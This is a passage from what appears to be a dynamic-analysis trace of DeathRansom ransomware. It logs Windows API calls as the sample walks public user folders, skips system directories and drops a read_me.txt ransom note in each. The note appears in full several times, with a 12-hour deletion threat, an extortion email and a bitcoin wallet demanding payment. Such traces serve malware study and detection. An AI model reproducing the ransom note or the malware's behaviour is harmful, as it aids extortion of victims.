ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.806] WriteFile (in: hFile=0x7c4, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17da6c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17da6c*=0x6b3, lpOverlapped=0x0) returned 1 [0076.807] CloseHandle (hObject=0x7c4) returned 1 [0076.807] GetProcessHeap () returned 0x4f10000 [0076.807] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d600b8 | out: hHeap=0x4f10000) returned 1 [0076.807] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="my videos", cAlternateFileName="MYVIDE~1")) returned 0 [0076.807] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.807] wnsprintfW (in: pszDest=0x8d20098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Documents\\read_me.txt") returned 41 [0076.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Documents\\read_me.txt" (normalized: "c:\\users\\public\\documents\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x77c [0076.807] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.807] WriteFile (in: hFile=0x77c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.808] CloseHandle (hObject=0x77c) returned 1 [0076.809] GetProcessHeap () returned 0x4f10000 [0076.809] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d20098 | out: hHeap=0x4f10000) returned 1 [0076.809] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0076.809] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads") returned 29 [0076.809] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0076.809] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0076.809] StrStrW (lpFirst="downloads", lpSrch="programdata") returned 0x0 [0076.809] StrStrW (lpFirst="downloads", lpSrch="$recycle.bin") returned 0x0 [0076.809] StrStrW (lpFirst="downloads", lpSrch="program files") returned 0x0 [0076.809] StrStrW (lpFirst="downloads", lpSrch="windows") returned 0x0 [0076.809] StrStrW (lpFirst="downloads", lpSrch="all users") returned 0x0 [0076.809] StrStrW (lpFirst="downloads", lpSrch="appdata") returned 0x0 [0076.809] GetProcessHeap () returned 0x4f10000 [0076.809] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d20098 [0076.809] lstrcpyW (in: lpString1=0x8d20098, lpString2="\\\\?\\C:\\Users\\Public\\Downloads" | out: lpString1="\\\\?\\C:\\Users\\Public\\Downloads") returned="\\\\?\\C:\\Users\\Public\\Downloads" [0076.809] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 129 [0076.809] QueueUserWorkItem (Function=0x40a710, Context=0x8d20098, Flags=0x0) returned 1 [0076.809] GetProcessHeap () returned 0x4f10000 [0076.809] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d600b8 [0076.809] wnsprintfW (in: pszDest=0x8d600b8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\*") returned 31 [0076.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.810] wnsprintfW (in: pszDest=0x8d600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\.") returned 31 [0076.810] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.810] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.810] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.810] wnsprintfW (in: pszDest=0x8d600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\..") returned 32 [0076.810] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.810] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.810] wnsprintfW (in: pszDest=0x8d600b8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0076.810] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28351f0f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28351f0f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0076.810] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.810] wnsprintfW (in: pszDest=0x8d600b8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\read_me.txt") returned 41 [0076.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\read_me.txt" (normalized: "c:\\users\\public\\downloads\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x77c [0076.810] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.810] WriteFile (in: hFile=0x77c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.811] CloseHandle (hObject=0x77c) returned 1 [0076.811] GetProcessHeap () returned 0x4f10000 [0076.811] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d600b8 | out: hHeap=0x4f10000) returned 1 [0076.811] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0076.811] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites") returned 29 [0076.811] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0076.811] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0076.812] StrStrW (lpFirst="favorites", lpSrch="programdata") returned 0x0 [0076.812] StrStrW (lpFirst="favorites", lpSrch="$recycle.bin") returned 0x0 [0076.812] StrStrW (lpFirst="favorites", lpSrch="program files") returned 0x0 [0076.812] StrStrW (lpFirst="favorites", lpSrch="windows") returned 0x0 [0076.812] StrStrW (lpFirst="favorites", lpSrch="all users") returned 0x0 [0076.812] StrStrW (lpFirst="favorites", lpSrch="appdata") returned 0x0 [0076.812] GetProcessHeap () returned 0x4f10000 [0076.812] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d600b8 [0076.812] lstrcpyW (in: lpString1=0x8d600b8, lpString2="\\\\?\\C:\\Users\\Public\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\Public\\Favorites") returned="\\\\?\\C:\\Users\\Public\\Favorites" [0076.812] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 130 [0076.812] QueueUserWorkItem (Function=0x40a710, Context=0x8d600b8, Flags=0x0) returned 1 [0076.812] GetProcessHeap () returned 0x4f10000 [0076.812] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d700c0 [0076.813] wnsprintfW (in: pszDest=0x8d700c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\*") returned 31 [0076.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.813] wnsprintfW (in: pszDest=0x8d700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\.") returned 31 [0076.813] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.813] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.813] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.813] wnsprintfW (in: pszDest=0x8d700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\..") returned 32 [0076.813] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.813] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfdae6622, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xaee7d305, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 0 [0076.814] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.814] wnsprintfW (in: pszDest=0x8d700c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\Public\\Favorites\\read_me.txt") returned 41 [0076.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\read_me.txt" (normalized: "c:\\users\\public\\favorites\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0076.884] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0076.884] WriteFile (in: hFile=0x780, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17dce4, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17dce4*=0x6b3, lpOverlapped=0x0) returned 1 [0076.884] CloseHandle (hObject=0x780) returned 1 [0076.885] GetProcessHeap () returned 0x4f10000 [0076.885] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8d700c0 | out: hHeap=0x4f10000) returned 1 [0076.885] FindNextFileW (in: hFindFile=0x7cfe9a8, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Libraries", cAlternateFileName="LIBRAR~1")) returned 1 [0076.885] wnsprintfW (in: pszDest=0x8cf0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries") returned 29 [0076.885] lstrcmpW (lpString1="Libraries", lpString2="..") returned 1 [0076.885] lstrcmpW (lpString1="Libraries", lpString2=".") returned 1 [0076.885] StrStrW (lpFirst="libraries", lpSrch="programdata") returned 0x0 [0076.885] StrStrW (lpFirst="libraries", lpSrch="$recycle.bin") returned 0x0 [0076.885] StrStrW (lpFirst="libraries", lpSrch="program files") returned 0x0 [0076.885] StrStrW (lpFirst="libraries", lpSrch="windows") returned 0x0 [0076.885] StrStrW (lpFirst="libraries", lpSrch="all users") returned 0x0 [0076.885] StrStrW (lpFirst="libraries", lpSrch="appdata") returned 0x0 [0076.885] GetProcessHeap () returned 0x4f10000 [0076.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d700c0 [0076.885] lstrcpyW (in: lpString1=0x8d700c0, lpString2="\\\\?\\C:\\Users\\Public\\Libraries" | out: lpString1="\\\\?\\C:\\Users\\Public\\Libraries") returned="\\\\?\\C:\\Users\\Public\\Libraries" [0076.885] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 131 [0076.885] QueueUserWorkItem (Function=0x40a710, Context=0x8d700c0, Flags=0x0) returned 1 [0076.885] GetProcessHeap () returned 0x4f10000 [0076.885] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8d800c8 [0076.886] wnsprintfW (in: pszDest=0x8d800c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\*") returned 31 [0076.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.887] wnsprintfW (in: pszDest=0x8d800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\.") returned 31 [0076.887] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0076.887] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0076.887] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28a29e5c, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a29e5c, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0076.887] wnsprintfW (in: pszDest=0x8d800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\..") returned 32 [0076.887] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0076.887] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: lpFindFileData=0x17da80*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0076.887] wnsprintfW (in: pszDest=0x8d800c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Libraries\\desktop.ini") returned 41 [0076.887] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x17da80 | out: 